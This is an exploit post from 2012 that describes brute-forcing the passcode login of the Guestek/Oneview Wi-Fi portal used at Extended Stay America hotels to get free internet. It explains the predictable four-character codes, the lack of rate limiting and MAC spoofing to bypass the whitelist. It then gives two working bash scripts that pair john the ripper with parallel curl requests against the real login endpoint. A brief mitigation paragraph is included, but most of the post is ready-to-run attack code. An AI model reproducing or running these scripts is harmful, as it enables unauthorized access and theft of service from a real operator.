# Exploit Title: Guestek / Oneview - Extended Stay 5 dollar crack # Date: 2012-01-04 ( The end is near!! ) # Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo) # Software Link: https://login.globalsuite.net # Version: 2 (tested), same idea works on older systems # Spamvertise: https://www.facebook.com/Boycottcpanel - Join the boycott This is a popular login system for Extended Stay of America hotels. Basically every since I was 21 they always started their passcodes with the letter D. They are also 4 characters in length and always in uppercase letters. So That leaves us with a little less than 45000 possibilities that our passcode could be. The guestek system also uses does not protect against brute force attacks. So with the fail script below in a matter of 3-4 hours or less we can slam it 10-15 passcodes a second. With out degrading system performance. Then within the 4 hours at some point we have free internet. They also use mac address whitelisting so the code changed on Jan 1st but I've still been able to connect since then doing my testing by changing my mac address. The solution use stronger passcodes, also add bruteforce protection so after 20 failed attempts(I have made over 100k while testing) block the mac address, set a cookie also with a code so the web app knows not to allow access to the login prompt. Make mac address whitelist clear after 24 hours and use a cookie on the clients box to verify user before adding them back to the mac white list. ------PoC------ Script needs curl( curl.haxx.se ) and john the ripper ( www.openwall.com/john ) . usage - ./oneveiw.sh - then just wait. oneview.sh- #!/bin/bash curl -s --location https://login.globalsuite.net/v2/Login count=0 pcount=0 pmax=30 [ ! -e ./oneviewdebug ] && mkdir debug [ -e ./oneviewpass ] && rm oneviewpass for a in `john --incremental:alnum --stdout:3 | tr '[a-z]' '[A-Z]'`;do if [ ${#a} -gt 2 ]; then ./curloneview.sh D${a} & count=$(($count + 1)) pcount=`ps aux | grep curl | wc -l` if (( $pcount > $pmax )); then sleep 2 fi if [ -e ./oneviewpass ];then echo "Password found"; cat ./oneviewpass rm -fr ./oneviewdebug exit fi fi done [ -e ./debug ] && rm -fr ./oneviewdebug --EOF-- curloneview.sh- #!/bin/bash pass="$1"; echo -ne "Trying ${pass} \r" function curlit(){ curl -s -d "passcode=${pass}&firstname=joe&lastname=swanson&companyname=help%40juno.com" --output "./oneviewdebug/${pass}output.txt" --referer https://login.globalsuite.net/v2/Login --location https://login.globalsuite.net/v2/globalnet/ProcessPasscode } function chkpass(){ chk=`grep "#alert-error#_#AJAX#_# Invalid passcode entered" ./oneviewdebug/${pass}output.txt` if [ "$chk" != "#alert-error#_#AJAX#_# Invalid passcode entered" ];then echo "Password is ${pass}" echo ${pass} > ./oneviewpass fi } while [ ! -e "./oneviewdebug/${pass}output.txt" ]; do curlit done chkpass